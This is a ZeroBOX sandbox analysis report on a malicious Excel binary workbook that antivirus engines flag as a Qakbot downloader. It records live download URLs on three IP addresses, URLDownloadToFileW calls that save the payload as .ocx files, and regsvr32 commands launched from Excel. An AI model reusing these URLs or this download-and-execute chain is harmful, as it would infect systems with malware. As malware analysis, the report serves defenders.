popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

ATTR-147470270-Apr-4.xlsb

Malicious Library Excel Binary Workbook file format(xlsb)
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 April 6, 2022, 5:19 p.m. April 6, 2022, 5:22 p.m.
Size 1.2MB
Type Microsoft Excel 2007+
MD5 31d57098f695e4a999a109309cc6cc6a
SHA256 8b711bf4fd44853bbd5e833d5b472a7d7214ab637083eaf99590acd1aca8691a
CRC32 1AB43DE4
ssdeep 24576:vvTXkVoeBosJ0Rev1ke6P00TDKqKxBNKxBvKxBfKxBdKxBVKxBOId:vDkvBokCP00XKq+N+v+f+d+V+OY
Yara
  • xlsb - Excel Binary Workbook file format detection
  • Malicious_Library_Zero - Malicious_Library

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
149.255.36.223 Active Moloch
164.124.101.2 Active Moloch
185.33.86.42 Active Moloch
185.82.126.17 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

suspicious_features Connection to IP address suspicious_request GET http://185.82.126.17/44651,6679619213.dat
suspicious_features Connection to IP address suspicious_request GET http://149.255.36.223/44651,6679619213.dat
suspicious_features Connection to IP address suspicious_request GET http://185.33.86.42/44651,6679619213.dat
request GET http://185.82.126.17/44651,6679619213.dat
request GET http://149.255.36.223/44651,6679619213.dat
request GET http://185.33.86.42/44651,6679619213.dat
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2100
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75260000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2100
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b4b3000
process_handle: 0xffffffff
1 0 0
file C:\ProgramData\Frister.ocx
file C:\ProgramData\Frister1.ocx
file C:\ProgramData\Frister2.ocx
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000414
filepath: C:\Users\test22\AppData\Local\Temp\~$ATTR-147470270-Apr-4.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$ATTR-147470270-Apr-4.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
cmdline regsvr32 /s C:\ProgramData\Frister.ocx
cmdline regsvr32 /s C:\ProgramData\Frister2.ocx
cmdline regsvr32 /s C:\ProgramData\Frister1.ocx
host 149.255.36.223
host 185.33.86.42
host 185.82.126.17
Sangfor Malware.Generic-XLM.Save.ma35
Cyren XF/SneakyBin.E.gen!Eldorado
Avast VBS:Malware-gen
ClamAV Xls.Downloader.GreenOffice12210-9918618-0
Kaspersky HEUR:Trojan.MSOffice.Generic
Tencent Trojan.MsOffice.Macro40.11003135
McAfee-GW-Edition Artemis
Ikarus Trojan-Downloader.XLM.Agent
Microsoft TrojanDownloader:O97M/Qakbot.AMDG!MTB
ZoneAlarm HEUR:Trojan.MSOffice.Generic
GData Macro.Trojan-Downloader.Agent.BDH
Fortinet MSExcel/Agent.IF!tr.dldr
AVG VBS:Malware-gen
Time & API Arguments Status Return Repeated

URLDownloadToFileW

 url: http://185.82.126.17/44651,6679619213.dat
stack_pivoted: 0
filepath_r: C:\ProgramData\Frister.ocx
filepath: C:\ProgramData\Frister.ocx
2148270088 0

URLDownloadToFileW

 url: http://149.255.36.223/44651,6679619213.dat
stack_pivoted: 0
filepath_r: C:\ProgramData\Frister1.ocx
filepath: C:\ProgramData\Frister1.ocx
2148270088 0

URLDownloadToFileW

 url: http://185.33.86.42/44651,6679619213.dat
stack_pivoted: 0
filepath_r: C:\ProgramData\Frister2.ocx
filepath: C:\ProgramData\Frister2.ocx
2148270088 0
parent_process excel.exe martian_process regsvr32 /s C:\ProgramData\Frister.ocx
parent_process excel.exe martian_process regsvr32 /s C:\ProgramData\Frister2.ocx
parent_process excel.exe martian_process regsvr32 /s C:\ProgramData\Frister1.ocx